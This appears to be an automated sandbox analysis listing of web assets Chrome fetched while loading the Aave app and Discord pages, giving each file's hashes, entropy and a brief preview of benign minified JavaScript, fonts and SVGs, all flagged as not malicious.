                                                                                                                                                                                                                                                  Preview:self.__BUILD_MANIFEST=function(s,c,a,e,t,n,i,r,f,k,u,h,d,j,b){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[s,"static/chunks/3645-9203dd9404a3977e.js","static/chunks/4254-ac0dd33f5ae839d3.js","static/chunks/1573-73b9595d97d74de8.js",n,c,a,e,i,"static/chunks/7604-eabb8e5b8018f878.js",k,"static/chunks/pages/index-5c55ce06141b7657.js"],"/404":[s,c,"static/chunks/pages/404-a9ff97d7bb01fc2f.js"],"/500":[s,c,"static/chunks/pages/500-cd1f18444ed6a64c.js"],"/_error":["static/chunks/pages/_error-f7c9e698edebedd1.js"],"/faucet":[s,c,a,e,"static/chunks/pages/faucet-a346b6eab1b79032.js"],"/governance":[r,s,t,f,u,h,c,d,"static/chunks/pages/governance-0757370cd87e1b88.js"],"/governance/ipfs-preview":[r,s,t,f,j,b,c,"static/chunks/pages/governance/ipfs-preview-d4ba601042d90009.js"],"/governance/v3/proposal":[r,s,t,f,j,b,u,"static/chunks/457-5fe4350bf05020d1.js",c,d,"static/chunks/pages/governance/v3/proposal-9ec103a761ebafd5.js"],"/history":[s,"static/chunks/8265-203250b91b340fb9.j
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 39764, version 2.66
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):39764
                                                                                                                                                                                                                                                  Entropy (8bit):7.993646621116526
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:768:90TMDBOLlFMKbQDweRs+mkq4oY+VT6p+0t5LMXTkfm7s/U2Uq:6TppGKMDwtN4orTAHjMDja
                                                                                                                                                                                                                                                  MD5:71D3E9DC2BCB8E91225BA9FAB588C8F2
                                                                                                                                                                                                                                                  SHA1:D7E38EE4C245F64B78EB18E6ECD7B9F53B3254A8
                                                                                                                                                                                                                                                  SHA-256:AE99AAEDE2F373187A4FE442A2CB0AB9C2945EFBAB01CF33E01BE517C0C4F813
                                                                                                                                                                                                                                                  SHA-512:DEDA05EBD575D413AA2277876991ECC2EA238907390753485BA1B487EDE2F432363C46DAAD5F3F240EAAF8D3258150829A3AE3D2D9C420EA59567CFD440361A6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/1222195a37d6dd10994e.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......T......}........B..........................z.. .`..P..D..W........S.6.$..`..r.. .....F..=[.W..ir.h......,......j..In.X....Uj..3...`K\t........".%.]..p..E........G..9&r...S.+.r.5....~`.....S'..1~.a..H...S.........N.tX2G7.u..m.z.!.......).w....V....:.6..W.\.+..j.K...[|.n..dg.....Kx:;....7?2.j..\...0..=zd.(...{.c.....}._..Q.....dUx....b.\Y,.........W.b.zkAX.,..X..jO..*w..% .[..DD.X..G\..?.9..\.G...#...T ..".$.Z.P...W..*5.b.._......}at.....@2.A.....m...5Oy....e.a...D...'.s.$...Q.......[.....A.....r..&....8.Q.KZ.#G...#_.~...yh1$.b~.0S[..6..+...../...jdlcC_0S..J.J!e.'...)3.O..}.C.)...v.qn.......5}.7{.m.b.&:.S..h>.hz..."N.G8..A..&.....s...3<...C... _.F$.`.J.....UuKv.ik.H.'....e..b-k..kt..!....Q.l.R)ai&....Dp..\T).O...'6.<....u..Wi*M.s....I@.....+.....=...&.6.N..n.....\..k...8.....P6.f..k{...3....5....C..T.iG.5....s...$W*..=^.*..3..V.._\..J..2`.........z........1....l.F... .zVb...0.Z..=........[2?.V.....J.....!4B.U..**.....>.Ta`0...
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):68
                                                                                                                                                                                                                                                  Entropy (8bit):4.537696988526014
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YNEyLLB6UQEDdFMJwnDEY9:YF16JqLMJwf9
                                                                                                                                                                                                                                                  MD5:D9589AF2B36EA54FCCC5CD7C88C292B5
                                                                                                                                                                                                                                                  SHA1:CD387EA798EF4489765E2E34025ACA3488545D94
                                                                                                                                                                                                                                                  SHA-256:922A5EE036EFADF0819602EAA0AA5DADA3913441B5447CAC777BE2E2D97F5E3F
                                                                                                                                                                                                                                                  SHA-512:13630998EC8E753B1F1EDD73D4C1CFE10D20138764F2CCC93B065B64B1AFAD207A682AD5AF8193F855B8D361FF4E2B2651D455D83BFBCF746C8454E9336ABF87
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:{"hash":"fddab3e36b38117512b4d612365af827c49e9868","required":false}
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7992), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7992
                                                                                                                                                                                                                                                  Entropy (8bit):5.774756598890741
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:7W3F5u4LYkL4PpFHJAPH8UP3EEG41PLmZt:UHQpFpAPH8UPVGMm
                                                                                                                                                                                                                                                  MD5:7CADD6F406E52CD496078A04EE76D077
                                                                                                                                                                                                                                                  SHA1:44C3BCA515BE0EAEC1EABDAB4793A7759FB99027
                                                                                                                                                                                                                                                  SHA-256:6C169CFE1B4088B93E6C17E4A843A7ACD04EF8EFA66B4435DEAA4E2FFCAA5C18
                                                                                                                                                                                                                                                  SHA-512:829454B30E1623FA22B2E22139F32CD7D49CEA139F81604B7966700FDB9BD9F69A62BFAF8DAA251645CD315056ACD0DBD4F8CB36BC09AA7277F8B4C289C3FADC
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,f,g,l,m,v,x,z){V=b,function(c,d,U,B,C){for(U=b,B=c();!![];)try{if(C=-parseInt(U(229))/1*(-parseInt(U(240))/2)+parseInt(U(262))/3+parseInt(U(265))/4+parseInt(U(179))/5+parseInt(U(212))/6+parseInt(U(190))/7*(-parseInt(U(235))/8)+parseInt(U(234))/9*(-parseInt(U(167))/10),d===C)break;else B.push(B.shift())}catch(D){B.push(B.shift())}}(a,692335),f=this||self,g=f[V(228)],l={},l[V(256)]='o',l[V(168)]='s',l[V(248)]='u',l[V(188)]='z',l[V(210)]='n',l[V(194)]='I',m=l,f[V(222)]=function(B,C,D,E,a4,G,H,I,J,K,L){if(a4=V,null===C||C===void 0)return E;for(G=s(C),B[a4(196)][a4(268)]&&(G=G[a4(171)](B[a4(196)][a4(268)](C))),G=B[a4(217)][a4(173)]&&B[a4(165)]?B[a4(217)][a4(173)](new B[(a4(165))](G)):function(M,a5,N){for(a5=a4,M[a5(183)](),N=0;N<M[a5(170)];M[N]===M[N+1]?M[a5(172)](N+1,1):N+=1);return M}(G),H='nAsAaAb'.split('A'),H=H[a4(202)][a4(236)](H),I=0;I<G[a4(170)];J=G[I],K=o(B,C,J),H(K)?(L=K==='s'&&!B[a4(272)](C[J]),a4(260)===D+J?F(D+J,K):L||F(D+J,C[J])):F(D+
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17583), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17583
                                                                                                                                                                                                                                                  Entropy (8bit):5.541378089136963
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:nqPQ7VeiHZenoFOT0R1n4sRI7OzFNJfmYOsOZZaZKEOVyX8:M8VecZUq5I7OzYTZZaZRX8
                                                                                                                                                                                                                                                  MD5:34A9A96546638961144AA957EA260F3B
                                                                                                                                                                                                                                                  SHA1:799464E1F5A0D8AA6D139119FD11E155B510EAF1
                                                                                                                                                                                                                                                  SHA-256:F10B7374B39B705FC05315D31EB04330ED755E0F1E54E04864A07016B4498509
                                                                                                                                                                                                                                                  SHA-512:4CD7A27FD271C6932CEFD8F7360517A86679C6D0A33FF5F89E2126397A491D83B147E65784756B224DEDE289A5C8FB25BBC6A9385B7B808B27B3315FBBBB62DC
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7888],{47130:function(e,t,r){r.d(t,{X:function(){return c}});var n=r(30120),o=r(90149),i=(r(67294),r(46839)),s=r(38776),a=r(85893),c=function(e){var t=e.children,r=(0,i.HT)(),c=r.user;return r.loading?(0,a.jsx)(n.Z,{sx:{width:"100%",display:"flex",alignItems:"center",justifyContent:"center"},children:(0,a.jsx)(o.Z,{})}):((0,s.Z)(c,"User data loaded but no user found"),(0,a.jsx)(a.Fragment,{children:t(c)}))}},29002:function(e,t,r){r.d(t,{o:function(){return u}});var n=r(59499),o=r(4730),i=r(81645),s=r(85893),a=["sx"];function c(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function l(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?c(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):4804
                                                                                                                                                                                                                                                  Entropy (8bit):3.9838661314243433
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:Ez1Y5tmUKv0bhb9lsqYnlV4XdUo4e7JR0Tn515GGNj1j:eWtRK8Z4qYnlV4Xdt6RGaj1j
                                                                                                                                                                                                                                                  MD5:22FD790491653D837422D80E3500CF92
                                                                                                                                                                                                                                                  SHA1:E0618307DDC1E06D85729819B115D0652ABB148C
                                                                                                                                                                                                                                                  SHA-256:641B1091276BA75578C3D93F367F0D70BCBBA7C62A7F159C4307ACF0ED6C5CBE
                                                                                                                                                                                                                                                  SHA-512:AD2100B9391969B160D3DE80C7310CF5706B89CD097D8B48D6DF0D96E9CFB73C15DDD487DF7773C28094A152EC9D4F8F6E6B718C96FAF734708018C65511266E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/23a7a3fd6624342117bf.svg
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="36" viewBox="0 0 130 36" width="130" xmlns="http://www.w3.org/2000/svg"><g fill="#fff"><path d="m27.5247 8.06243c-2.1034-.96349-4.3524-1.66374-6.7036-2.06243-.2888.51114-.6261 1.19861-.8587 1.74553-2.4995-.36802-4.9759-.36802-7.4293 0-.2326-.54692-.5777-1.23439-.869-1.74553-2.35376.39869-4.60533 1.1015-6.70864 2.06754-4.242451 6.27676-5.392506 12.39766-4.817478 18.43156 2.813808 2.0574 5.540698 3.3071 8.221628 4.1249.6619-.892 1.25228-1.8401 1.76089-2.8394-.96862-.3603-1.89634-.805-2.77294-1.3213.23259-.1686.46001-.345.67979-.5265 5.34655 2.4484 11.15555 2.4484 16.43815 0 .2224.1815.4498.3579.6798.5265-.8791.5188-1.8094.9635-2.778 1.3239.5086.9967 1.0964 1.9474 1.7609 2.8393 2.6834-.8178 5.4129-2.0675 8.2267-4.1274.6747-6.9949-1.1526-13.0595-4.8302-18.43667zm-16.6759 14.72587c-1.6049 0-2.92111-1.467-2.92111-3.2534s1.28807-3.2559 2.92111-3.2559c1.6331 0 2.9493 1.4669 2.9212 3.2559.0025 1.7864-1.2881 3.2534-2.9212 3.2534zm10.7952 0c-1.6049 0-2.9211-1.467-2.9211-3
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17588), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17588
                                                                                                                                                                                                                                                  Entropy (8bit):5.441979320405256
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:V1pURffa6XWfdQ3eiOt2JN3Ddj80Ka1d5/Y5/t5/U:Pyhfa6X73dOt2JrJYJtJU
                                                                                                                                                                                                                                                  MD5:05FCF3CD38749A8662530D5665AEABCD
                                                                                                                                                                                                                                                  SHA1:A4E376EE6AE45F8D6533D2B0125AD9123429453D
                                                                                                                                                                                                                                                  SHA-256:952DEA1DC1EDDA61B66F787C0B1A2D29F11B225EB1833B71E61CC5AF5EFCCFB9
                                                                                                                                                                                                                                                  SHA-512:E08B855744AE43084B68759FBA0EFE3E9DE6F14C67FDE2BD5986DC0008B0DC6CB7A3A46960A2B966640CF049F4F848F6C9DCA2716A1774AB880163A16523FCB3
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1226],{1252:function(e,t,r){r.d(t,{O:function(){return a}});var n=r(49501),s=r(85893),a=function(){return(0,s.jsx)(n.cC,{id:"Due to internal stETH mechanics required for rebasing support, it is not possible to perform a collateral switch where stETH is the source token."})}},17211:function(e,t,r){r.r(t),r.d(t,{SwapModal:function(){return le}});var n=r(59499),s=r(49501),a=r(67294),o=r(31959),i=r(47130),l=r(8195),u=r(94635),c=r(67484),d=r(30120),p=r(81645),m=r(29630),f=r(9144),x=r(70794),h=r(25935),v=r(41024),y=r(72667),g=r(69331),b=r(53601),w=r(57824),j=r(1252),A=r(29946),S=r(74119),O=r(30313),T=r(43629),D=r(46930),C=r(77537),E=r(20301),k=r(94847),P=r(69125),L=r(68448),I=r(87385),R=r(73965),Z=r(93608),B=r(94671),F=r(99730),N=r(50029),_=r(17674),U=r(4730),M=r(87794),W=r.n(M),H=r(75331),Y=r(80854),V=r(21732),z=r(78371),q=r(67489),G=r(85893),K=["amountToSwap","amountToReceive","isWrongNetwork","sx","poolReserve","targetR
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):137
                                                                                                                                                                                                                                                  Entropy (8bit):4.832107377824175
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:t6WH7W+lFAATcvcmJDmJS4RKb5KVErcHrFvR8hiJqGrqL0:t6Abli/c8mc4slmrFv2hiAe
                                                                                                                                                                                                                                                  MD5:70275FE3104CF1D3388586AD8FFD478E
                                                                                                                                                                                                                                                  SHA1:473EA46F5B22B5C7D14C39EE9C0C82811593883B
                                                                                                                                                                                                                                                  SHA-256:3269CF3FDA7681388472225BAD39B6BB3B26088A0A03B6CD5796195F0114CE13
                                                                                                                                                                                                                                                  SHA-512:044C0F8F1583FAEBA3A23FF2DF821A5A0E79C548DB3A6474614894DA2CB125476227407F865CF20D32DC7E4D9ADE09EBA6317EFB787EEED2570C0EBDFC401D2A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg fill="none" height="8" viewBox="0 0 9 8" width="9" xmlns="http://www.w3.org/2000/svg"><path d="m4.5 0 4.5 8h-9z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (35657), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):35657
                                                                                                                                                                                                                                                  Entropy (8bit):5.531416777373343
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:xyPr8VecZUKpzDKYazC4cdIiYStZwhUAkxCNO6LL7aZMEE0RIGM:5eDIflHZUUAjBP7aZMEE0R4
                                                                                                                                                                                                                                                  MD5:C53EE617F66EE2D319C91E2F6AFF7084
                                                                                                                                                                                                                                                  SHA1:45703BF3C5518E7FECC2251446FAA0FB9166A5C9
                                                                                                                                                                                                                                                  SHA-256:F84830A12C267FE7E71A72C0BBB06A286A3DD5AC3920A10851AE4EDD972BEEDA
                                                                                                                                                                                                                                                  SHA-512:AC9E9585021FCA606EC4AD3F112C85F505C47912903863774320A77E3493B3983CDB8A868D9D27D1ABF132938572374203011998B66DB82C59E2415BB4B17C57
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/9421.b5ce6bd95a5baa0f.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9421],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var a=r(n(64938)),o=n(85893),s=(0,a.default)((0,o.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),a=n(4730),o=n(81645),s=n(85893),i=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function l(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{}
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7890), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):7890
                                                                                                                                                                                                                                                  Entropy (8bit):5.320661374510762
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:UvY88VxM9nRv+ZPMVF8XNkdvVMKNJAjBx:CQVCTmlE9BJyBx
                                                                                                                                                                                                                                                  MD5:50606DFF33E656CFB42A10A49676C0D5
                                                                                                                                                                                                                                                  SHA1:A4D3D2F081346BD71F04367AC418E793DEC76CD6
                                                                                                                                                                                                                                                  SHA-256:0BC6A3B242558A2A32FEDF076513607E35F41078D93162DA3AF670C278DE8D1D
                                                                                                                                                                                                                                                  SHA-512:CF9F8F05EB83B65F9381E34356A993EC3205C427BCE133369A858D792ED1BFA269BB380E6A09081A0E6F23196AA32BCA49AB1DE3A3254A068163D062F0847942
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/1497.8e36954048946218.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1497],{94671:function(e,t,n){n.d(t,{NI:function(){return r},gK:function(){return s},pQ:function(){return o},Fi:function(){return i},iv:function(){return c},Vc:function(){return l},yI:function(){return p}});var r,a=n(70794),u=n(29946);!function(e){e[e.SUPPLY_CAP_REACHED=0]="SUPPLY_CAP_REACHED",e[e.NOT_ENOUGH_COLLATERAL_TO_REPAY_WITH=1]="NOT_ENOUGH_COLLATERAL_TO_REPAY_WITH",e[e.ZERO_LTV_WITHDRAW_BLOCKED=2]="ZERO_LTV_WITHDRAW_BLOCKED",e[e.FLASH_LOAN_NOT_AVAILABLE=3]="FLASH_LOAN_NOT_AVAILABLE"}(r||(r={}));var s=function(e,t){return"-1"!==e&&new a.O(e).minus(new a.O(t)).lt("1.05")},o=65e3,i=55e3,c=function(e){var t=e.approvedAmount,n=e.signedAmount,r=e.amount;return!("-1"===t||"-1"===n||"0"!==t&&Number(t)>=Number(r)||Number(n)>=Number(r))},l=function(e){var t=[];return e.userReservesData.forEach((function(e){Number(e.scaledATokenBalance)>0&&"0"===e.reserve.baseLTVasCollateral&&e.usageAsCollateralEnabledOnUser&&"0"!==e.res
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (46641), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):46641
                                                                                                                                                                                                                                                  Entropy (8bit):5.469706628412611
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:cyPK6Dadwq9sGmjphCsBnyuCLcoZLHcdVS3cZJQvFLXmLbGM/VzAm2GbNX:QZkphCpHcdQdnMdX
                                                                                                                                                                                                                                                  MD5:BB1842271FE5B418C63E3EB6F030E80F
                                                                                                                                                                                                                                                  SHA1:34BC8BE1B36833E926FF95D6BCBD62585A060196
                                                                                                                                                                                                                                                  SHA-256:C80E8D5C50E720CA34EC3B170196D826987164A9C881566877E3DDA0067318FB
                                                                                                                                                                                                                                                  SHA-512:AA1218E2973D6E98E5F2B178B209E4522ACE7F9ECAFB9C2A0C95C7D523C43E3C9C1F755F0996166A370D482E06DD1350D92D2D22C8A241E1F5F6CCF0BF07FB68
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/797.224fdb0a57599ef0.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[797],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),a=r(85893),s=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=s},89722:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(87462),o=r(63366),a=r(67294),s=r(86010),i=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=r(85893);const f=["baseClassName","classNam
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):92
                                                                                                                                                                                                                                                  Entropy (8bit):4.440074751043314
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:kw3dA4jgWYHJiv3dA4jgW6QfpXD3dA4jgW6Qen:FtDjdYHJwtDjd6EpXDtDjd6h
                                                                                                                                                                                                                                                  MD5:7C3F7E060745668041278118C0BB3D6D
                                                                                                                                                                                                                                                  SHA1:E639F56695B3CC30D78DCE7A0084AA8299A1311A
                                                                                                                                                                                                                                                  SHA-256:DE5341313A4DC5D982CA50AE4A491E84BC5E80B0F439D87F05FC3973C1B7E59A
                                                                                                                                                                                                                                                  SHA-512:B12A692EF9BE5857423F2DF563B986E241F7161573B5A7F23190696D1B0A50C5DA453C7BD35641FE61695B459D0A7D76F8053A8E0E0CCBC6811F800AAB1532C6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (20818), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):20818
                                                                                                                                                                                                                                                  Entropy (8bit):5.48489057276009
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:k+ci34Ogokuz/S7W2Ar2OA2IIuPLGA7YEmHvy0euuZZi+tI7OztAP5MM/tiSEMff:kxoa7W2AqO8Iu0mlI7Oz4mfM8De
                                                                                                                                                                                                                                                  MD5:2CD1C7795E820E4734A0270EC4DE9BF6
                                                                                                                                                                                                                                                  SHA1:C81C50AB4048AA2E17CDCC19092305D3557A2792
                                                                                                                                                                                                                                                  SHA-256:29C5B9B984DBF4B69917B8E34969C012A7A92873EF57BDC6582BC581D8DC86B3
                                                                                                                                                                                                                                                  SHA-512:609751CBB193B9F8028D269B5E415B7718133AE6B302E0382A0E390F5BBB813269E207C7DAA360B0076121BAE8740D62E81EB9F0F7900690BE7C4E503F60EA5B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/6083-20b4cdfe836910e6.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6083],{68682:function(e,t,n){n.d(t,{MB:function(){return A},ET:function(){return T},n2:function(){return k}});var r=n(1279),i=n(80059),o=n(30120),a=n(29630),s=n(81645),c=n(67294),l=n(49338),u=n(78371),d=n(57609),p=n(97563),f=n(41024),m=n(72667),x=n(59499),v=n(49501),b=n(92391),y=n(85893);function h(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function j(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?h(Object(n),!0).forEach((function(t){(0,x.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):h(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var g={aEthLidoWETH:{tokenIconSymbol:"WETH",symbol:"aWETH",a
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (23552), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):23552
                                                                                                                                                                                                                                                  Entropy (8bit):5.468472558609081
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:MaJyrR/WmyO0/z4ij53g4tZkSX27VgTM9eqPTb/F:X0Elh5w4tZkSX27mITbF
                                                                                                                                                                                                                                                  MD5:197740C77B76EFF728028E9DE793944B
                                                                                                                                                                                                                                                  SHA1:EAC0D21401A55AF1DF486A5D07E522B1653119F1
                                                                                                                                                                                                                                                  SHA-256:A55EC5364080B18CF04A0CFD921959B02D03C926CE24C5A31835817D5A64E369
                                                                                                                                                                                                                                                  SHA-512:F87B105B0AA1939215CE1AF758A32DF90727FD1E82328DB1DAA6BECC727C6B0E0716CAF6A42197E39265BD46C5C89FD0EA2BF70ED76DA508BFED50A0212B90D6
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/1811.176323f7838502d3.js
